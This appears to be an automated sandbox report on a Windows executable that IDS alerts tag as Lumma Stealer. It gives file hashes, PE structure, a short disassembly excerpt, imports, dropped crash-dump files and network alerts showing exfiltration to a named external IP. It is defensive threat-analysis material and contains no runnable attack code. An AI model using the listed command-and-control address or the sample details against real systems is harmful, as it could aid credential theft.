                                                        MD5:8B78AC2ED0F69C319E060BADFE213524
                                                        SHA1:601739C05ABC194E87C7460788438799CBF52279
                                                        SHA-256:FF8E4F672902C473E4280A314A6DF5D5E5B6F4E49ECDD95DFC54BE1BCDB1F486
                                                        SHA-512:24AD49F347FB655AFE6B623D8B91878472F8F9559300CD58EBE5208F155219CD6C70D7839F379E515E5F33CD54915F4C7595F22C86C3C7B5ED723FE0FEDDFEDB
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:MDMP..a..... ........w4g............4...............H.......<...........T...."..........`.......8...........T............B..Pa..........L...........8...............................................................................eJ..............GenuineIntel............T.......L....w4gM............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):8336
                                                        Entropy (8bit):3.7024715539745583
                                                        Encrypted:false
                                                        SSDEEP:192:R6l7wVeJRI6aY26YSqSUdgmfdYpDy89bvEsf0FFm:R6lXJ+6ah6YvSUdgmfdev3fT
                                                        MD5:5A0CF5FBCD8F402C4DF17AED5075F114
                                                        SHA1:1E6FDE590E3DFB54753CF31FE1D5432D231D3B54
                                                        SHA-256:A3E1E476F62630AA35B84FAD76C8DEF4C2B9835377FF249287B5726481AC308C
                                                        SHA-512:79DC2E4BA0B79F7673F747D0A4FAC5818DB53521C871D2A17C09AB57CFE0F521724C16AD6FD3CC7FB461045BFED6FF679E39ED3A8C4F48EC62D7D3771A4AC760
                                                        Malicious:false
                                                        Reputation:low
Preview (UTF-16LE with BOM, decoded):
<?xml version="1.0" encoding="UTF-16"?>
<WERReportMetadata>
  <OSVersionInformation>
    <WindowsNTVersion>10.0</WindowsNTVersion>
    <Build>19045</Build>
    <Product>(0x30): Windows 10 Pro</Product>
    <Edition>Professional</Edition>
    <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
    <Revision>2006</Revision>
    <Flavor>Multiprocessor Free</Flavor>
    <Architecture>X64</Architecture>
    <LCID>2057</LCID>
  </OSVersionInformation>
  <ProcessInformation>
    <Pid>7500</Pi (preview truncated)
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):4579
                                                        Entropy (8bit):4.473223919125026
                                                        Encrypted:false
                                                        SSDEEP:48:cvIwWl8zsSJg77aI9nMWpW8VYuYm8M4J9tFwjV+q8+BScqId:uIjfgI7xl7VGJSVxzqId
                                                        MD5:A9DE4FB8DFEFBECA1EDB7075BAAB6942
                                                        SHA1:E9492D8EC00AA32349719DDA47300D3126FCC182
                                                        SHA-256:254298481A1AA0446D17019EB4A7D0F48209075DC955F7C6BAC550AA0983EE6B
                                                        SHA-512:0746F6A96935320BE3AE6038EC8892C628DC74F4CC5A0EDAFDB7922021FB40AE2BEFCBB3CC292CFDA00CAD88AFDA0EBD91E7B9ACD863BA52F5153C200E9BB9B1
                                                        Malicious:false
                                                        Reputation:low
Preview:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<req ver="2">
 <tlm>
 <src>
 <desc>
 <mach>
 <os>
 <arg nm="vermaj" val="10" />
 <arg nm="vermin" val="0" />
 <arg nm="verbld" val="19045" />
 <arg nm="vercsdbld" val="2006" />
 <arg nm="verqfe" val="2006" />
 <arg nm="csdbld" val="2006" />
 <arg nm="versp" val="0" />
 <arg nm="arch" val="9" />
 <arg nm="lcid" val="2057" />
 <arg nm="geoid" val="223" />
 <arg nm="sku" val="48" />
 <arg nm="domain" val="0" />
 <arg nm="prodsuite" val="256" />
 <arg nm="ntprodtype" val="1" />
 <arg nm="platid" val="2" />
 <arg nm="tmsi" val="586139" />
 <arg nm="osinsty" val="1" />
 <arg nm="iever" val="11.789.19041.0-11.0.1000" />
 <arg nm="portos" val="0" />
 <arg nm="ram" val="409 (preview truncated)
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 1835008
Entropy (8bit): 4.372088739129614
Encrypted: false
SSDEEP: 6144:sFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguN2iL5:cV1QyWWI/glMM6kF7Uq
MD5: B83EF58CD4FEE920D622AC23A56F77CB
SHA1: 19A8F49E9246F62FEC7BAEB73CCE1E249139E9C9
SHA-256: EA9E5BBC0B046BCF8D75AD6F787A7F901114BB10DDCB6E663A9A97085515546B
SHA-512: 1FB5AF3352DF4A009AE92C7839AA8E41D861C386B572F718255C9654A00C735AC3C1B7F4BE99BA437A1C9AD2F4BF12F554B62D2FD573F30A570B940361E011F2
Malicious: false
Reputation: low
                                                        Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmN.nQ.5..............................................................................................................................................................................................................................................................................................................................................Z.ye........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.161752093231944
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: I2BJhmJou4.exe
File size: 474'624 bytes
MD5: c847cb3090530ec9ae2e82805a03360d
SHA1: a7f075ba37961545ae0a819bda5d2be28618d60d
SHA256: 16f4ab4f0ba6ebd746bcc6b032346ffb80f88814e78e103739af0e5569fee962
SHA512: d8640e1ef34c4679215d515ef9594c39a9db51a672897489926a6a2b60cb2376beb0634808c11b72104a02c26c1cacd9dc9d98c78862b2411f3cc4bbe72ea32c
SSDEEP: 12288:YALM9byCGBIH114+JbdWBOCGDInCDuz3gTR9:YAebZG2H11NJb4G0nBOR
TLSH: 2CA49D4353A1BD59EB254B729E1EC6F8361DF9518F093B7A720C6E2F06B0872C1A7711
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y...............n.......n<......n=......`...............n9......n.......n......Rich............PE..L...+..a...................
Icon Hash: 4a183e435119984a
Entrypoint: 0x405c58
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x61B51A2B [Sat Dec 11 21:37:47 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: f1a2f8d8b54600da323a01db4f49195d
Instruction
call 00007FD5A1155F57h
jmp 00007FD5A11523AEh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 00401294h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007FD5A115252Eh
test byte ptr [eax], 00000008h
je 00007FD5A1152529h
mov dword ptr [ebp-0Ch], 01994000h
lea eax, dword ptr [ebp-0Ch]
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-1Ch]
push dword ptr [ebp-20h]
call dword ptr [004010FCh]
leave
retn 0008h
mov edi, edi
push ebp
mov ebp, esp
mov edx, dword ptr [ebp+08h]
push esi
push edi
test edx, edx
je 00007FD5A1152529h
mov edi, dword ptr [ebp+0Ch]
test edi, edi
jne 00007FD5A1152535h
call 00007FD5A115274Dh
push 00000016h
pop esi
mov dword ptr [eax], esi
call 00007FD5A1153560h
mov eax, esi
jmp 00007FD5A1152555h
mov eax, dword ptr [ebp+10h]
test eax, eax
jne 00007FD5A1152526h
mov byte ptr [edx], al
jmp 00007FD5A1152504h
mov esi, edx
sub esi, eax
mov cl, byte ptr [eax]
mov byte ptr [esi+eax], cl
inc eax
test cl, cl
je 00007FD5A1152525h
dec edi
jne 00007FD5A1152515h
test edi, edi
jne 00007FD5A1152533h
mov byte ptr [edx], 00000000h
call 00007FD5A1152717h
push 00000022h
pop ecx
mov dword ptr [eax], ecx
mov esi, ecx
jmp 00007FD5A11524E8h
xor eax, eax
pop edi
pop esi
pop ebp
ret
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007FD5A1152546h
mov al, byte ptr [ecx]
add ecx, 00000000h
Programming Language:
• [ASM] VS2010 build 30319
• [ C ] VS2010 build 30319
• [C++] VS2010 build 30319
• [IMP] VS2008 SP1 build 30729
• [RES] VS2010 build 30319
• [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1233c | 0x3c | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x28fe000 | 0x1bc18 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3998 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x1c0 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x11da0 | 0x11e00 | b76206d2d320499f3ff13cf1c189d29e | False | 0.5574874344405595 | data | 6.463633330803623 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x13000 | 0x28ead04 | 0x45e00 | 4822dc0d5f14f6436350a2de158cfe65 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x28fe000 | 0x1bc18 | 0x1be00 | 07946ee195931bcc383a16c4df6a010e | False | 0.3036627662556054 | data | 3.8590886530682353 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x2917050 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.7598684210526315
RT_CURSOR | 0x2917198 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.4473684210526316
RT_CURSOR | 0x29172c8 | 0xf0 | Device independent bitmap graphic, 24 x 48 x 1, image size 0 | | | 0.4625
RT_CURSOR | 0x29173b8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.08583489681050657
RT_CURSOR | 0x2918490 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.3407039711191336
RT_ICON | 0x28fea80 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | India | 0.3986175115207373
RT_ICON | 0x28fea80 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | Sri Lanka | 0.3986175115207373
RT_ICON | 0x28ff148 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | India | 0.3908959537572254
RT_ICON | 0x28ff148 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | Sri Lanka | 0.3908959537572254
RT_ICON | 0x28ff6b0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | India | 0.27790806754221387
RT_ICON | 0x28ff6b0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | Sri Lanka | 0.27790806754221387
RT_ICON | 0x2900758 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.3421985815602837
RT_ICON | 0x2900758 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.3421985815602837
RT_ICON | 0x2900c00 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | India | 0.39981949458483756
RT_ICON | 0x2900c00 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | Sri Lanka | 0.39981949458483756
RT_ICON | 0x29014a8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | India | 0.4498847926267281
RT_ICON | 0x29014a8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | Sri Lanka | 0.4498847926267281
RT_ICON | 0x2901b70 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | India | 0.4226878612716763
RT_ICON | 0x2901b70 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | Sri Lanka | 0.4226878612716763
RT_ICON | 0x29020d8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | India | 0.2767354596622889
RT_ICON | 0x29020d8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | Sri Lanka | 0.2767354596622889
RT_ICON | 0x2903180 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | India | 0.28114754098360656
RT_ICON | 0x2903180 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | Sri Lanka | 0.28114754098360656
RT_ICON | 0x2903b08 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.3191489361702128
RT_ICON | 0x2903b08 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.3191489361702128
RT_ICON | 0x2903fd0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | India | 0.3715351812366738
RT_ICON | 0x2903fd0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | Sri Lanka | 0.3715351812366738
RT_ICON | 0x2904e78 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | India | 0.48104693140794225
RT_ICON | 0x2904e78 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | Sri Lanka | 0.48104693140794225
RT_ICON | 0x2905720 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | India | 0.5247695852534562
RT_ICON | 0x2905720 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | Sri Lanka | 0.5247695852534562
RT_ICON | 0x2905de8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | India | 0.5513005780346821
RT_ICON | 0x2905de8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | Sri Lanka | 0.5513005780346821
RT_ICON | 0x2906350 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Tamil | India | 0.20342323651452282
RT_ICON | 0x2906350 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Tamil | Sri Lanka | 0.20342323651452282
RT_ICON | 0x29088f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Tamil | India | 0.2347560975609756
RT_ICON | 0x29088f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Tamil | Sri Lanka | 0.2347560975609756
RT_ICON | 0x29099a0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Tamil | India | 0.25163934426229506
RT_ICON | 0x29099a0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Tamil | Sri Lanka | 0.25163934426229506
RT_ICON | 0x290a328 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Tamil | India | 0.3067375886524823
RT_ICON | 0x290a328 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Tamil | Sri Lanka | 0.3067375886524823
RT_ICON | 0x290a808 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | India | 0.28251599147121537
RT_ICON | 0x290a808 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | Sri Lanka | 0.28251599147121537
RT_ICON | 0x290b6b0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | India | 0.3934331797235023
RT_ICON | 0x290b6b0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | Sri Lanka | 0.3934331797235023
RT_ICON | 0x290bd78 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | India | 0.39739884393063585
RT_ICON | 0x290bd78 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | Sri Lanka | 0.39739884393063585
RT_ICON | 0x290c2e0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | India | 0.2233402489626556
RT_ICON | 0x290c2e0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | Sri Lanka | 0.2233402489626556
RT_ICON | 0x290e888 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | India | 0.2795497185741088
RT_ICON | 0x290e888 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | Sri Lanka | 0.2795497185741088
RT_ICON | 0x290f930 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | India | 0.3016393442622951
RT_ICON | 0x290f930 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | Sri Lanka | 0.3016393442622951
RT_ICON | 0x29102b8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.3395390070921986
RT_ICON | 0x29102b8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.3395390070921986
RT_ICON | 0x2910788 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | India | 0.31369936034115137
RT_ICON | 0x2910788 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | Sri Lanka | 0.31369936034115137
RT_ICON | 0x2911630 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | India | 0.3813176895306859
RT_ICON | 0x2911630 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | Sri Lanka | 0.3813176895306859
RT_ICON | 0x2911ed8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | India | 0.42223502304147464
RT_ICON | 0x2911ed8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | Sri Lanka | 0.42223502304147464
RT_ICON | 0x29125a0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | India | 0.3872832369942196
RT_ICON | 0x29125a0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | Sri Lanka | 0.3872832369942196
RT_ICON | 0x2912b08 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Tamil | India | 0.23921161825726142
RT_ICON | 0x2912b08 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Tamil | Sri Lanka | 0.23921161825726142
RT_ICON | 0x29150b0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Tamil | India | 0.2774390243902439
RT_ICON | 0x29150b0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Tamil | Sri Lanka | 0.2774390243902439
RT_ICON | 0x2916158 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Tamil | India | 0.27991803278688526
RT_ICON | 0x2916158 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Tamil | Sri Lanka | 0.27991803278688526
RT_ICON | 0x2916ae0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Tamil | India | 0.32269503546099293
RT_ICON | 0x2916ae0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Tamil | Sri Lanka | 0.32269503546099293
RT_STRING | 0x2918f78 | 0x502 | data | Tamil | India | 0.4391575663026521
RT_STRING | 0x2918f78 | 0x502 | data | Tamil | Sri Lanka | 0.4391575663026521
RT_STRING | 0x2919480 | 0x394 | data | Tamil | India | 0.4606986899563319
RT_STRING | 0x2919480 | 0x394 | data | Tamil | Sri Lanka | 0.4606986899563319
RT_STRING | 0x2919818 | 0x396 | Matlab v4 mat-file (little endian) o, numeric, rows 0, columns 0 | Tamil | India | 0.46187363834422657
RT_STRING | 0x2919818 | 0x396 | Matlab v4 mat-file (little endian) o, numeric, rows 0, columns 0 | Tamil | Sri Lanka | 0.46187363834422657
RT_STRING | 0x2919bb0 | 0x64 | data | Tamil | India | 0.65
RT_STRING | 0x2919bb0 | 0x64 | data | Tamil | Sri Lanka | 0.65
RT_ACCELERATOR | 0x2916fc0 | 0x90 | data | Tamil | India | 0.6944444444444444
RT_ACCELERATOR | 0x2916fc0 | 0x90 | data | Tamil | Sri Lanka | 0.6944444444444444
RT_GROUP_CURSOR | 0x2917180 | 0x14 | data | | | 1.15
RT_GROUP_CURSOR | 0x2918d38 | 0x14 | data | | | 1.25
RT_GROUP_CURSOR | 0x2918460 | 0x30 | data | | | 1.0
RT_GROUP_ICON | 0x290a790 | 0x76 | data | Tamil | India | 0.6779661016949152
RT_GROUP_ICON | 0x290a790 | 0x76 | data | Tamil | Sri Lanka | 0.6779661016949152
RT_GROUP_ICON | 0x2900bc0 | 0x3e | data | Tamil | India | 0.8387096774193549
RT_GROUP_ICON | 0x2900bc0 | 0x3e | data | Tamil | Sri Lanka | 0.8387096774193549
RT_GROUP_ICON | 0x2903f70 | 0x5a | data | Tamil | India | 0.7222222222222222
RT_GROUP_ICON | 0x2903f70 | 0x5a | data | Tamil | Sri Lanka | 0.7222222222222222
RT_GROUP_ICON | 0x2910720 | 0x68 | data | Tamil | India | 0.7211538461538461
RT_GROUP_ICON | 0x2910720 | 0x68 | data | Tamil | Sri Lanka | 0.7211538461538461
RT_GROUP_ICON | 0x2916f48 | 0x76 | data | Tamil | India | 0.6864406779661016
RT_GROUP_ICON | 0x2916f48 | 0x76 | data | Tamil | Sri Lanka | 0.6864406779661016
RT_VERSION | 0x2918d50 | 0x228 | data | | | 0.5670289855072463
DLL | Import
KERNEL32.dll | GetProfileIntW, BuildCommDCBAndTimeoutsA, InterlockedIncrement, InterlockedDecrement, SetMailslotInfo, GetSystemWindowsDirectoryW, FreeEnvironmentStringsA, GetProcessPriorityBoost, EnumCalendarInfoExW, WaitNamedPipeW, EnumTimeFormatsW, GetDriveTypeA, GetProcessTimes, GetVolumePathNameW, GetCalendarInfoA, GetConsoleAliasExesLengthW, GetFileAttributesA, WriteConsoleW, SetSystemPowerState, GetModuleFileNameW, CompareStringW, GetShortPathNameA, EnumSystemLocalesA, SearchPathW, DeleteFiber, GetLastError, GetProcAddress, AttachConsole, HeapSize, SetComputerNameA, EnterCriticalSection, OpenWaitableTimerA, LoadLibraryA, GetProcessId, LocalAlloc, SetCalendarInfoW, IsSystemResumeAutomatic, AddAtomA, OpenJobObjectW, GetPrivateProfileStructA, FindFirstVolumeMountPointA, EnumDateFormatsA, CreateIoCompletionPort, GetModuleHandleA, CancelTimerQueueTimer, FreeEnvironmentStringsW, FindNextFileW, SetFileShortNameA, AreFileApisANSI, HeapCompact, GetPrivateProfileIntW, GetVolumeNameForVolumeMountPointA, HeapFree, HeapAlloc, DeleteFileA, WideCharToMultiByte, HeapReAlloc, GetCommandLineA, HeapSetInformation, GetStartupInfoW, RaiseException, IsProcessorFeaturePresent, HeapCreate, GetModuleHandleW, ExitProcess, DecodePointer, WriteFile, GetStdHandle, EncodePointer, LeaveCriticalSection, SetFilePointer, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, GetModuleFileNameA, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LoadLibraryW, Sleep, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, RtlUnwind, LCMapStringW, MultiByteToWideChar, GetStringTypeW, CloseHandle, CreateFileW
GDI32.dll | GetCharABCWidthsA, SelectObject
Language of compilation system | Country where language is spoken | Map
Tamil | India |
Tamil | Sri Lanka |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-13T10:53:30.089830+0100 | 2043206 | ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 | 1 | 192.168.2.8 | 49713 | 94.158.244.69 | 80 | TCP
2024-11-13T10:53:30.089830+0100 | 2043206 | ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 | 1 | 192.168.2.8 | 49708 | 94.158.244.69 | 80 | TCP
2024-11-13T10:54:22.079039+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.8 | 49706 | TCP
2024-11-13T10:54:34.362378+0100 | 2043206 | ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 | 1 | 192.168.2.8 | 49707 | 94.158.244.69 | 80 | TCP
2024-11-13T10:54:53.135143+0100 | 2043206 | ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 | 1 | 192.168.2.8 | 49709 | 94.158.244.69 | 80 | TCP
2024-11-13T10:54:59.967146+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.8 | 49711 | TCP
2024-11-13T10:55:02.213728+0100 | 2043206 | ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 | 1 | 192.168.2.8 | 49710 | 94.158.244.69 | 80 | TCP
2024-11-13T10:55:10.989197+0100 | 2043206 | ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 | 1 | 192.168.2.8 | 49712 | 94.158.244.69 | 80 | TCP
2024-11-13T10:55:29.613117+0100 | 2043206 | ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 | 1 | 192.168.2.8 | 49714 | 94.158.244.69 | 80 | TCP
2024-11-13T10:55:30.349548+0100 | 2043206 | ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 | 1 | 192.168.2.8 | 49715 | 94.158.244.69 | 80 | TCP
2024-11-13T10:55:30.349548+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.8 | 49715 | 94.158.244.69 | 80 | TCP
2024-11-13T10:55:48.326883+0100 | 2043206 | ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 | 1 | 192.168.2.8 | 49716 | 94.158.244.69 | 80 | TCP
2024-11-13T10:55:57.094150+0100 | 2043206 | ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 | 1 | 192.168.2.8 | 49717 | 94.158.244.69 | 80 | TCP
2024-11-13T10:56:06.203781+0100 | 2043206 | ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 | 1 | 192.168.2.8 | 49718 | 94.158.244.69 | 80 | TCP
2024-11-13T10:56:15.057549+0100 | 2043206 | ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 | 1 | 192.168.2.8 | 49719 | 94.158.244.69 | 80 | TCP
2024-11-13T10:56:23.838414+0100 | 2043206 | ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 | 1 | 192.168.2.8 | 49720 | 94.158.244.69 | 80 | TCP
